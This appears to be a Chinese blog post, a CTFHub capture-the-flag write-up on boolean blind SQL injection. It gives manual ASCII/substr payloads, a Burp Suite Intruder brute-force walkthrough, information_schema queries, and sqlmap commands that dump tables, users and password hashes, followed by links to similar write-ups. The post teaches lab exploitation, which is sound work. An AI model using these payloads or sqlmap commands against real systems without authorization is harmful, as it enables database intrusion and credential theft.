CTFHub(布尔盲注 判断是否,无回显)

最新推荐文章于 2024-06-12 08:30:00 发布
最新推荐文章于 2024-06-12 08:30:00 发布
阅读量2k 收藏 4
点赞数 2
分类专栏: ctfhub burpsuite 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/119452848
版权

盲注主要分为两种,一种为时间类型盲注,一种为布尔类型盲注

判断是否是布尔类型的:当一个界面存在注入,但是没有显示位,没有SQL语句执行错误信息,由于布尔类型的注入只会告知是或者不是,所以只能通过页面返回的对与错来进行一个SQL的注入

目录

布尔盲注手动方式

布尔盲注BurpSuite方式

sqlmap方式

布尔盲注手动方式

首先猜测数据库的长度

1 and length(database()) >5

报错了,数据库长度并不大于5,再次进行尝试

长度等于4,知道的数据库的长度,开始猜测数据库的名称,对应ASCII码表,输入id=1 and ascii(substr(database(),1,1))>110,回显正确,得知数据库名第一个字符的ASCII码大于110,输入id=1 and ascii(substr(database(),1,1))>200,回显错误,得知第一个ASCII码大于110小于200(ascii只有0~127位,随便举例子),输入id=1 and ascii(substr(database(),1,1))=115,回显正确,第一个字符为s

1 and ascii(substr(database(),1,1))=115

ASCII码表

最后测试出数据库名为'sqli',非常繁琐吧。。。还记得BurpSuite内的一个爆破功能吗?我们可以利用这个功能来快速的查内容,而不需要手动来试

布尔盲注BurpSuite方式

首先写一个字典

由于ASCII共127位,这里从0开始写到127即可【当然也可以用爆破自带的number】

打开BurpSuite

将interceot is off打开,打开后

点击Search

抓到包,右击send to intruder

host为url,port为端口,然后点击positions

点击clear,清清除所有的Add

然后选中对应ASCII的数,也就是末尾的数字

然后点击Add

点击payloads

加入字典

点击旁边的start,开始爆破

可以看到0和115的ASCII的长度 ,与其他的不同,判断数据库的第一个字母为's',爆破的时候,只需更改substr的值即可,以此类推得到'sqli'【注意,在这里substr默认值是1,1,而limit的默认值是0,1

column_name:列的名称

Information_schema.columns:表示所有的列的信息

Information_schema:表示所有信息,包括库、表、列

Information_schema.tables:表示所有的表的信息

table_schema:数据库的名称

table_name:表的名称

在不知道任何条件时,查询

Select 要查询的字段 from 库名.表名

在已知一个条件时

Select 要查询的字段 from 库名.表名 where 已知条件=’已知条件的值’

Group_concat(xxx_xxx)与limit m,n相同【m默认是0】

在已知一个及一个以上的条件时,用and连接或&&

Select 要查询的字段 from 库名.表名 where 已知条件=’已知条件的值’ and 已知条件=’已知条件的值’

sqlmap方式

关于sqlmap的基础命令,将url修改为需要注入的url即可

查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1
查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs
获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump
查询数据库的所有用户
sqlmap.py -u url/?id=1 --users
查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords
查询数据库名称
sqlmap.py -u url/?id=1 --current-db

bbb07
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub-sql布尔盲注
god_001的博客
06-01 674
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHUB-web-SQL注入
ookami6497的博客
11-29 800
CTFHUB SQL
CTFHUB-布尔盲注
Web学习之路
03-24 1071
true 与 false
CTFHub布尔盲注(新的payload)
weixin_44732566的博客
02-23 5454
CTFHub 布尔盲注 题目已经表明是布尔盲注,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔盲注不一样,一般布尔盲注(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
CTFHUB-SQL注入-布尔盲注
最新发布
weixin_68416970的博客
06-12 704
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
布尔盲注ctfhub
2401_82985722的博客
03-27 1082
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
ctfhub 布尔盲注
plant1234的博客
06-17 1565
布尔盲注: 布尔盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schem
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 1819
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数型注入,确定此题为整数型注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4339
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5337
Ctfhub解题 web SQL注入
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 872
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7041
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1100
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFhub布尔盲注
ndjnddjxn的博客
04-12 880
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
Ho1aAs‘s Blog
11-19 8138
文章目录前言盲注思路盲注原理盲注常用函数完 前言 布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 盲注思路 由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
ctfhub 布尔盲注解题思路
weixin_41718413的博客
10-16 1863
注入点是id,使用工具sqlmap,链接https://sqlmap.org/ 1、找数据库,运行: python sqlmap.py -u url --current-db --level 5 获得当前的数据库: 2、找表: python sqlmap.py -u url -D sqli --tables 会提示information_shema不能用,是否使用common table(用字典爆破,猜测应该是通过延时或返回的content-length长度),输入y (截图是找c..
CTFHUB-WEB-SQL注入-布尔盲注
weixin_49539962的博客
08-04 356
题目告诉我们了,这是个布尔盲注,就不需要一个个试验注入的方法了。接下来的解题思路应当是:首先通过折半查找的方法,通过界面的回显结果找出数据库名字的长度,并通过相同的方法依次找到数据库名字的每个字符、列名,然后再找到flag。自己手动一个个找当然可以,不过速度慢,写个脚本好了。有个工具叫sqlmap,用这个就不需要傻乎乎写脚本了。既然已知了数据库名字和列名,下面就在sqlmap上直接查flag吧(sqlmap实在是太慢了,陆陆续续续了40分钟)。找到数据库名还是叫sqli,估计列名里面有一个flag。
CTFHub-布尔盲注-wp #(自制脚本做法)
z1moq的博客
05-15 3785
CTFHub布尔盲注脚本 # -*- coding: utf-8 -*- # @Time : 2021/5/15 21:33 # @Author : z1moq # @File : ctfhub布尔盲注.py # @Software: PyCharm import requests import string def get_database(url, mark): database = '' for i in range(1, 9): for j in string.a
ctf 监听端口_浅谈ctf中的无回显
06-10
CTF中的无回显指的是无法直接从应用程序输出或网络流量中获取结果的情况。在某些情况下,CTF比赛的参赛者需要在没有回显的情况下解决一些问题,例如监听某个端口。 在CTF中,监听端口通常意味着需要在某个特定的端口上监听并接受传入的连接。这可能需要编写一个简单的服务或服务器程序来监听该端口,等待连接并对其进行处理。 在无回显的情况下,参赛者无法直接看到他们的输入是否产生了任何输出。这意味着他们需要尝试不同的输入来确定他们的输入是否被正确处理。这需要一些技巧和经验,因为他们必须根据一些指示或假设来尝试输入,以便找到正确的答案。 因此,在CTF中,无回显是一种常见的情况,需要参赛者具备一定的技巧和经验才能成功地解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值